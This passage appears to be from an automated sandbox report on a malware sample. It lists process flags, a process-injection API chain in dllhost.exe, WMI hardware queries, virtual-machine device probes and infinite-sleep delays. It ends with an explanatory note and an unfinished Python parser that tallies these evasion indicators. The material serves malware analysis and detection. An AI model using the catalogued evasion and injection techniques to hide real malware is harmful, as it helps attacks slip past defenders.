Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 41_2_0000000140001868
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: powershell.exe, 00000009.00000002.1690548235.0000027533723000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000009.00000002.1690548235.0000027533723000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxMiniRdrDN
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5296
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4458
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3723
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6917
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2087
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1854
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 401
Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 356
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 370
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 360
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 358
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\cmd.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Source: C:\Windows\System32\svchost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\cmd.exe API coverage: 4.5 %
Source: C:\Windows\System32\conhost.exe API coverage: 8.0 %
Source: C:\Windows\System32\conhost.exe API coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exe API coverage: 9.0 %
Source: C:\Windows\System32\lsass.exe API coverage: 8.2 %
Source: C:\Windows\System32\svchost.exe API coverage: 4.1 %
Source: C:\Windows\System32\dwm.exe API coverage: 9.0 %
Source: C:\Windows\System32\svchost.exe API coverage: 8.0 %
Source: C:\Windows\System32\svchost.exe API coverage: 4.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516 Thread sleep count: 5296 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516 Thread sleep count: 4458 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 400 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3312 Thread sleep count: 3184 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3312 Thread sleep count: 3723 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3084 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7120 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4376 Thread sleep count: 5108 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4376 Thread sleep count: 1854 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5580 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 344 Thread sleep count: 283 > 30
Source: C:\Windows\System32\dllhost.exe TID: 5688 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 5804 Thread sleep count: 401 > 30
Source: C:\Windows\System32\winlogon.exe TID: 5804 Thread sleep time: -40100s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 1424 Thread sleep count: 356 > 30
Source: C:\Windows\System32\lsass.exe TID: 1424 Thread sleep time: -35600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2052 Thread sleep count: 370 > 30
Source: C:\Windows\System32\svchost.exe TID: 2052 Thread sleep time: -37000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 4812 Thread sleep count: 178 > 30
Source: C:\Windows\System32\svchost.exe TID: 5756 Thread sleep count: 360 > 30
Source: C:\Windows\System32\svchost.exe TID: 5756 Thread sleep time: -36000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3308 Thread sleep count: 358 > 30
Source: C:\Windows\System32\svchost.exe TID: 3308 Thread sleep time: -35800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3300 Thread sleep count: 294 > 30
Source: C:\Windows\System32\svchost.exe TID: 6176 Thread sleep count: 335 > 30
Source: C:\Windows\System32\svchost.exe TID: 6176 Thread sleep time: -33500s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 896 Thread sleep count: 330 > 30
Source: C:\Windows\System32\svchost.exe TID: 896 Thread sleep time: -33000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3660 Thread sleep count: 320 > 30
Source: C:\Windows\System32\svchost.exe TID: 3660 Thread sleep time: -32000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2760 Thread sleep count: 311 > 30
Source: C:\Windows\System32\svchost.exe TID: 2760 Thread sleep time: -31100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7152 Thread sleep count: 292 > 30
Source: C:\Windows\System32\svchost.exe TID: 3060 Thread sleep count: 308 > 30
Source: C:\Windows\System32\svchost.exe TID: 3060 Thread sleep time: -30800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1028 Thread sleep count: 303 > 30
Source: C:\Windows\System32\svchost.exe TID: 1028 Thread sleep time: -30300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1780 Thread sleep count: 298 > 30
Source: C:\Windows\System32\svchost.exe TID: 5448 Thread sleep count: 291 > 30
Source: C:\Windows\System32\svchost.exe TID: 2780 Thread sleep count: 289 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
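The rows above record three evasion primitives the sandbox attributes to the sample: WMI hardware enumeration (Win32_DiskDrive, Win32_BaseBoard, Win32_BIOS, Win32_ComputerSystem, Win32_Processor), opens of hypervisor guest devices (VBoxGuest, VBoxTrayIPC, VBoxMiniRdrDN, vmci, HGFS) and stalling with the delay value 922337203685477. That value is Int64.MaxValue / 10000, i.e. .NET TimeSpan.MaxValue reduced from 100 ns ticks to whole milliseconds, so it is an effectively infinite wait; the per-thread sleep-time totals reported above are exact multiples of it (x1, x3, x5 and x8). The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses rows in the report's own "Source: <image> <indicator>: <value>" layout and summarises them per process. The embedded rows are a constructed subset copied from this section; the vendor keyword list is my assumption.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Int64.MaxValue / 10000, i.e. .NET TimeSpan.MaxValue converted from 100 ns ticks to
# whole milliseconds.  The report shows it as "delay time: 922337203685477"; a wait of
# that length never elapses inside an analysis window.
INFINITE_MS = 922337203685477

# Assumed vendor fingerprints (my list, not taken from the report): substrings of the
# guest device, driver and service names a sample probes to recognise a hypervisor.
VM_ARTIFACTS = {
    "virtualbox": ("vbox",),
    "vmware": ("vmci", "hgfs", "vmware", "vmmouse", "vmusrvc"),
    "hyper-v": ("vmic", "hyper-v"),
    "qemu": ("qemu", "bochs", "bxpc"),
}

# Row layout used throughout the report: "Source: <image path> <indicator>: <value>".
ROW_RE = re.compile(r"^Source:\s+(?P<proc>\S+?\.exe)\s+(?P<rest>.*)$", re.I)
WMI_CLASS_RE = re.compile(r"\bfrom\s+(\w+)", re.I)
DELAY_RE = re.compile(r"delay time:\s*(\d+)")
SLEEP_COUNT_RE = re.compile(r"TID:\s*(\d+)\s+Thread sleep count:\s*(\d+)")
SLEEP_TIME_RE = re.compile(r"TID:\s*(\d+)\s+Thread sleep time:\s*(-?\d+)s")


@dataclass
class ProcessSummary:
    wmi_classes: set = field(default_factory=set)         # WMI classes enumerated
    vm_probes: dict = field(default_factory=dict)         # probed name -> vendor
    infinite_waits: int = 0                               # "Thread delayed" rows at the sentinel
    sleep_loops: dict = field(default_factory=dict)       # tid -> [sleep counts]
    max_waits_by_tid: dict = field(default_factory=dict)  # tid -> sentinel waits issued


def classify_artifact(name):
    """Return the hypervisor vendor a probed device/driver name gives away, or None."""
    low = name.lower()
    for vendor, needles in VM_ARTIFACTS.items():
        if any(n in low for n in needles):
            return vendor
    return None


def parse_report(rows):
    """Group the report's evasion rows by process image name."""
    out = defaultdict(ProcessSummary)
    for raw in rows:
        m = ROW_RE.match(raw.strip())
        if not m:
            continue  # memory-string rows ("Source: <image>, <dump>") use another layout
        proc = m.group("proc").rsplit("\\", 1)[-1].lower()
        rest = m.group("rest")
        s = out[proc]
        if rest.startswith("WMI Queries:"):
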